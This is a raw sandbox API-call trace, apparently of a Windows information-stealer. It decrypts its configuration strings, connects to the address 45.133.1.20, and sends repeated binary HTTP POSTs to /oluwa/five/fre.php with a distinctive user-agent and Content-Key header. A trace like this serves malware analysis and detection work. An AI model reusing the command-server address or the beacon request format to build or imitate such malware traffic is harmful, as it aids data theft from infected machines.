[0251.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.339] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.340] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.340] GetProcessHeap () returned 0x6a0000 [0251.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0251.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.341] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0251.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.342] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.344] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0251.344] GetProcessHeap () returned 0x6a0000 [0251.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.348] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.354] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.358] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.360] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.360] GetProcessHeap () returned 0x6a0000 [0251.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0251.360] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.360] GetProcessHeap () returned 0x6a0000 [0251.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0251.361] GetProcessHeap () returned 0x6a0000 [0251.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.361] GetProcessHeap () returned 0x6a0000 [0251.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0251.362] GetProcessHeap () returned 0x6a0000 [0251.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0251.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.363] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0251.382] GetProcessHeap () returned 0x6a0000 [0251.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0251.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.383] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0251.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.384] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.385] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.385] GetProcessHeap () returned 0x6a0000 [0251.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0251.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.387] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0251.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.391] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.392] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0251.392] GetProcessHeap () returned 0x6a0000 [0251.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.394] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0251.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.394] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0251.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.395] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0251.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.396] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0251.396] GetProcessHeap () returned 0x6a0000 [0251.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0251.397] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0251.397] GetProcessHeap () returned 0x6a0000 [0251.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0251.397] socket (af=2, type=1, protocol=6) returned 0x848 [0251.397] connect (s=0x848, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0251.427] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0251.427] GetProcessHeap () returned 0x6a0000 [0251.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0251.427] GetProcessHeap () returned 0x6a0000 [0251.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0251.428] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.429] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.429] GetProcessHeap () returned 0x6a0000 [0251.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5038 [0251.429] GetProcessHeap () returned 0x6a0000 [0251.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.430] GetProcessHeap () returned 0x6a0000 [0251.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0251.430] GetProcessHeap () returned 0x6a0000 [0251.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0251.430] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.431] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.431] GetProcessHeap () returned 0x6a0000 [0251.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0251.431] GetProcessHeap () returned 0x6a0000 [0251.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.432] send (s=0x848, buf=0x6bd460*, len=242, flags=0) returned 242 [0251.433] send (s=0x848, buf=0x6bb998*, len=159, flags=0) returned 159 [0251.433] GetProcessHeap () returned 0x6a0000 [0251.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0251.433] recv (in: s=0x848, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0251.507] GetProcessHeap () returned 0x6a0000 [0251.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0251.509] GetProcessHeap () returned 0x6a0000 [0251.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0251.509] GetProcessHeap () returned 0x6a0000 [0251.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5038 | out: hHeap=0x6a0000) returned 1 [0251.510] GetProcessHeap () returned 0x6a0000 [0251.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0251.510] closesocket (s=0x848) returned 0 [0251.511] GetProcessHeap () returned 0x6a0000 [0251.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0251.511] GetProcessHeap () returned 0x6a0000 [0251.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.511] GetProcessHeap () returned 0x6a0000 [0251.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0251.511] GetProcessHeap () returned 0x6a0000 [0251.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0251.512] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1578) returned 0x848 [0251.545] Sleep (dwMilliseconds=0xea60) [0251.547] GetProcessHeap () returned 0x6a0000 [0251.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0251.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.548] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.566] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0251.576] GetProcessHeap () returned 0x6a0000 [0251.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0251.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.578] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0251.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.579] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.581] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.581] GetProcessHeap () returned 0x6a0000 [0251.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0251.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.582] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0251.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.583] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.585] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0251.585] GetProcessHeap () returned 0x6a0000 [0251.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.586] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.587] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.589] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.590] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.590] GetProcessHeap () returned 0x6a0000 [0251.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0251.590] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.590] GetProcessHeap () returned 0x6a0000 [0251.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0251.591] GetProcessHeap () returned 0x6a0000 [0251.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.591] GetProcessHeap () returned 0x6a0000 [0251.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0251.592] GetProcessHeap () returned 0x6a0000 [0251.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0251.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.600] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0251.608] GetProcessHeap () returned 0x6a0000 [0251.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0251.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.609] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0251.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.610] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.611] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.611] GetProcessHeap () returned 0x6a0000 [0251.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0251.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.613] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0251.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.615] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.618] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0251.618] GetProcessHeap () returned 0x6a0000 [0251.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.619] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0251.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.620] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0251.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.621] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0251.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.622] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0251.622] GetProcessHeap () returned 0x6a0000 [0251.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0251.623] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0251.623] GetProcessHeap () returned 0x6a0000 [0251.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0251.623] socket (af=2, type=1, protocol=6) returned 0x84c [0251.623] connect (s=0x84c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0251.660] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0251.660] GetProcessHeap () returned 0x6a0000 [0251.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0251.660] GetProcessHeap () returned 0x6a0000 [0251.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0251.661] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.662] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.662] GetProcessHeap () returned 0x6a0000 [0251.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5038 [0251.662] GetProcessHeap () returned 0x6a0000 [0251.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.663] GetProcessHeap () returned 0x6a0000 [0251.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0251.663] GetProcessHeap () returned 0x6a0000 [0251.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0251.664] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.666] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.666] GetProcessHeap () returned 0x6a0000 [0251.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0251.666] GetProcessHeap () returned 0x6a0000 [0251.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.666] send (s=0x84c, buf=0x6bd460*, len=242, flags=0) returned 242 [0251.667] send (s=0x84c, buf=0x6bb998*, len=159, flags=0) returned 159 [0251.667] GetProcessHeap () returned 0x6a0000 [0251.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0251.667] recv (in: s=0x84c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0251.757] GetProcessHeap () returned 0x6a0000 [0251.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0251.758] GetProcessHeap () returned 0x6a0000 [0251.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0251.759] GetProcessHeap () returned 0x6a0000 [0251.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5038 | out: hHeap=0x6a0000) returned 1 [0251.760] GetProcessHeap () returned 0x6a0000 [0251.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0251.760] closesocket (s=0x84c) returned 0 [0251.761] GetProcessHeap () returned 0x6a0000 [0251.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0251.761] GetProcessHeap () returned 0x6a0000 [0251.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.761] GetProcessHeap () returned 0x6a0000 [0251.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0251.762] GetProcessHeap () returned 0x6a0000 [0251.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0251.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x157c) returned 0x84c [0251.764] Sleep (dwMilliseconds=0xea60) [0251.766] GetProcessHeap () returned 0x6a0000 [0251.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0251.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0251.783] GetProcessHeap () returned 0x6a0000 [0251.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba290 [0251.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.784] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6ba290, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0251.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.785] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.786] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.786] GetProcessHeap () returned 0x6a0000 [0251.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba290 | out: hHeap=0x6a0000) returned 1 [0251.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.788] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0251.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.789] CryptDestroyKey (hKey=0x6ad020) returned 1 